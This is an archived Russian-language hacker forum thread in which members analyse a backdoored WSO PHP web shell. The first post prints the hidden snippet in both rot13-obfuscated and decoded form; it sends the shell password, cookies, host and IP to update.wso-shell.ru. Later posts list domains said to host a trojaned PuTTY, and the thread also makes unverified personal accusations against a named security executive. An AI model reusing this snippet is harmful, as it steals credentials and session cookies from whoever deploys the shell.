RDot

RDot (https://rdot.org/forum/index.php)
-   Оффтоп/Offtopic (https://rdot.org/forum/forumdisplay.php?f=12)
-   -   Скандалы интриги расследования (https://rdot.org/forum/showthread.php?t=3702)

12309 27.06.2016 21:58

Скандалы интриги расследования
 
одна крыса (Кирилл «isox» Ермаков, главный безопасник QIWI) распространяет wso со стучалкой: https://habrahabr.ru/company/xakep/blog/303880/

> http://wso-shell.ru/wso2.txt

Код:

eval(str_rot13('$qngn=(@pbaireg_hhrapbqr($_FREIRE["UGGC_UBFG"]."|".$_FREIRE["CUC_FRYS"]."|".@$_CBFG["cnff"]."|".@$_FREIRE["UGGC_PBBXVR"]."|".$_FREIRE["ERZBGR_NQQE"]."|".$_FREIRE["UGGC_NPPRCG_YNATHNTR"]));$pgk = neenl ( "uggc" => neenl ( "zrgubq" => "CBFG", "urnqre"=> "Pbagrag-glcr: nccyvpngvba/k-jjj-sbez-heyrapbqrq\e\a" . "Pbagrag-Yratgu: " . fgeyra($qngn) . "\e\a", "pbagrag" => $qngn, "gvzrbhg" => 3, ) );$pgkk=fgernz_pbagrkg_perngr($pgk);rpub @svyr_trg_pbagragf("uggc://hcqngr.jfb-furyy.eh/nhgbhcqngr.cuc", snyfr, $pgkk);'));
==
Код:

$data=(@convert_uuencode($_SERVER["HTTP_HOST"]."|".$_SERVER["PHP_SELF"]."|".@$_POST["pass"]."|".@$_SERVER["HTTP_COOKIE"]."|".$_SERVER["REMOTE_ADDR"]."|".$_SERVER["HTTP_ACCEPT_LANGUAGE"]));$ctx = array ( "http" => array ( "method" => "POST", "header"=> "Content-type: application/x-www-form-urlencoded\r\n" . "Content-Length: " . strlen($data) . "\r\n", "content" => $data, "timeout" => 3, ) );$ctxx=stream_context_create($ctx);echo @file_get_contents("http://update.wso-shell.ru/autoupdate.php", false, $ctxx);
а статья вообще ппц. Кирилл, ты - ЧСВшный мудак.

crlf 28.06.2016 02:13

Банальный eval. Может безопасник сам юзает протрояненный шелл? Вообще кто-нибудь проверял чистый wso на секурность? Может там куда элегантней закладочка от разработчика есть? :)

profexer 28.06.2016 02:32

Цитата:

Сообщение от crlf (Сообщение 40132)
Банальный eval. Может безопасник сам юзает протрояненный шелл?

Очень даже вероятно, судя по статье.

Цитата:

Сообщение от crlf (Сообщение 40132)
Вообще кто-нибудь проверял чистый wso на секурность? Может там куда элегантней закладочка от разработчика есть? :)

Паранойя в край одолела? В таких случаях рецепт один - никому не доверяй кроме себя - возьми проверь сам. Потом свою ОС напиши и т.д. А в конце вспомни что доверять нельзя никому... даже себе и повтори все сначала)

P.S. Чуть не забыл - качайте мой шелл, делайте донейты =D

Molofya 28.06.2016 09:59

Цитата:

Сообщение от crlf (Сообщение 40132)
Банальный eval. Может безопасник сам юзает протрояненный шелл?

Не стоит его отмазывать, кирюша в прошлом бывший блекхет (если так можно выразиться), и не гнушается по сей день, подобными "фишками" против "киберпреступников". К сожалению, 90% вайтехков с аналогичным взглядом на жизнь.
И если присмотритесь повнимательнее, там никакого евала нету, там стучалка шелла и пароля к нему на тот же домен wso-shell.ru

Цитата:

Сообщение от crlf (Сообщение 40132)
Вообще кто-нибудь проверял чистый wso на секурность? Может там куда элегантней закладочка от разработчика есть? :)

Тут могу сказать, закладок от автора 100% нету. Я его шелл практически полностью модифицировал под себя (изучив каждую строчку кода детально), оставив только внешний дизайн, там все чисто.

SynQ 28.06.2016 12:06

Цитата:

Сообщение от 12309 (Сообщение 40129)
а статья вообще ппц. Кирилл, ты - ЧСВшный мудак.

он чересчур cocky для своих знаний, пусть дальше "скилляется", гонщег.

12309 28.06.2016 20:54

Domain Neighbors lookup for: 77.37.20.146
1 puttydownload.de
2 puttydownload.ru
3 puttydownload.us
4 unisono.de
5 wso-shell.ru

там еще и протрояненный путти лежит. будет забавно, если он действительно юзает пробэкдоренный всо и заходит на сервера со своего qiwi-директорского компа через протрояненный путти.

Molofya 28.06.2016 22:46

Цитата:

Сообщение от 12309 (Сообщение 40139)
Domain Neighbors lookup for: 77.37.20.146
1 puttydownload.de
2 puttydownload.ru
3 puttydownload.us
4 unisono.de
5 wso-shell.ru

там еще и протрояненный путти лежит. будет забавно, если он действительно юзает пробэкдоренный всо и заходит на сервера со своего qiwi-директорского компа через протрояненный путти.

Верно и то, и другое.
То, что он наплевательски относится как к работодателю, так и к самой безопасности, видно даже по его статейке на хабре, поэтому то, что его как лопуха затроянили, у меня сомнений нет.
А вот знающие люди говорят, что домены всё-таки его, и троянит он не только "киберпреступников". (на хабре его утверждение, что абсолютно все сливают инфу, тому только подтверждение)
В этом вся суть нынешнего WhiteHat, к сожалению.

AiR0 28.06.2016 23:56

Полный список
1 unisono.de
2 wso-shell.ru
3 puttydownload.de
4 puttydownload.ru
5 puttydownload.us
6 puttybuddy.us
7 puttyclient.ru
8 puttycs.de
9 unisonmasters.de
10 wso-online.ru

crlf 29.06.2016 03:39

Бог ему судья, пусть живёт как хочет, возмездие то придёт, как он сам говорит. Код исполнения стукача, лично мне, многое говорит об исполнителе :)
Возвращаясь к теме wso, с такой популярностью наверняка его уже вычитали вдоль и поперек, поэтому спросил только ради интереса.
На сколько я понимаю автор прикратил поддержку и это печалит. Хочется новых модных фишек html5/css3. Angular например прикрутить, шутка конечно, но диз посовременнее не помешает.

l1ght 29.06.2016 15:38

1. об этом домене только 1 упоминание в поисковиках - в его статье
2. закладка стучит на поддомен
3. прямо под ссылкой на wso-shell ссылка на автора jpeg-payload от BlackFan на rdot.org (но ему не известно кто автор wso)

Это не безопасник, бывший блекхат,или кем там он ещё себя называет. Это типичная крыса-изгой с большим чсв. Вместе "ксакепа" тебе стоило почитать "капитанскую дочку", кирилл (осознанно с маленькой буквы), хотя бы ее эпиграф. Соболезную PT и qiwi и рекомендую проверить на закладки его "вклад" в ваш софт, даже если их там нет ..

// все-таки это интервью, а автор статьи на хабре - ксакеп. маловероятно, но возможно, что эта ссылка - их рук дело


Часовой пояс GMT +3, время: 13:18.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot